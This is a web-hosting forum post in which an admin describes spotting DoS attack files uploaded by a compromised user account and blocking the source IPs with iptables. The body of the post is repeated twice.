turnkey
New member
Ok, I've been tracking this guy(s) down for a couple of weeks and finally got some control over it.
First, one of my users got compromised so the server is still safe.
This is what to look for:
1. check your /tmp all the time
2. check your /dev/shm all the time
Both of these are temp directories.
The user will try to upload dos attack files here.
The only way to catch them is to install phpsuexec, good thread at the cPanel forums and it is pretty easy now to setup.
Once phpsuexec is done, if you see strange files they will now be owned by a user instead of nobody (easier to track down).
Find the user who is causing the problem and suspend there account. I know they are not at fault but security comes first. They will understand. They may have to re-upload there site or look through all there php/cgi code if any nasty easter eggs have been dropped.
Now, look in your apache usage and find what they were doing. You will get there IP's.
In my example, I had 2 attempts from Canada and EV1. Both of these IP's have been dropped in iptables.
Here is now to block there IP's:
iptables -I INPUT -s 205.207.137.3 -j DROP | echo Dropped 205.207.137.3
iptables -I INPUT -s 64.246.42.44 -j DROP | echo Dropped 64.246.42.44
Remember this is only for when the machine is up. If you reboot you have to do this again. Might be a good idea to put it in a shell command and run it manually after a reboot o place in your /etc/init.d
Hope this helps, and if you are not running phpsuexec on cPanel you should. I have not seen any limitations to PHP at all. You might get a couple of 500 errors but they are easily fixed with the howto on cPanel's forums.
Good luck, hope this helps somebody.
First, one of my users got compromised so the server is still safe.
This is what to look for:
1. check your /tmp all the time
2. check your /dev/shm all the time
Both of these are temp directories.
The user will try to upload dos attack files here.
The only way to catch them is to install phpsuexec, good thread at the cPanel forums and it is pretty easy now to setup.
Once phpsuexec is done, if you see strange files they will now be owned by a user instead of nobody (easier to track down).
Find the user who is causing the problem and suspend there account. I know they are not at fault but security comes first. They will understand. They may have to re-upload there site or look through all there php/cgi code if any nasty easter eggs have been dropped.
Now, look in your apache usage and find what they were doing. You will get there IP's.
In my example, I had 2 attempts from Canada and EV1. Both of these IP's have been dropped in iptables.
Here is now to block there IP's:
iptables -I INPUT -s 205.207.137.3 -j DROP | echo Dropped 205.207.137.3
iptables -I INPUT -s 64.246.42.44 -j DROP | echo Dropped 64.246.42.44
Remember this is only for when the machine is up. If you reboot you have to do this again. Might be a good idea to put it in a shell command and run it manually after a reboot o place in your /etc/init.d
Hope this helps, and if you are not running phpsuexec on cPanel you should. I have not seen any limitations to PHP at all. You might get a couple of 500 errors but they are easily fixed with the howto on cPanel's forums.
Good luck, hope this helps somebody.
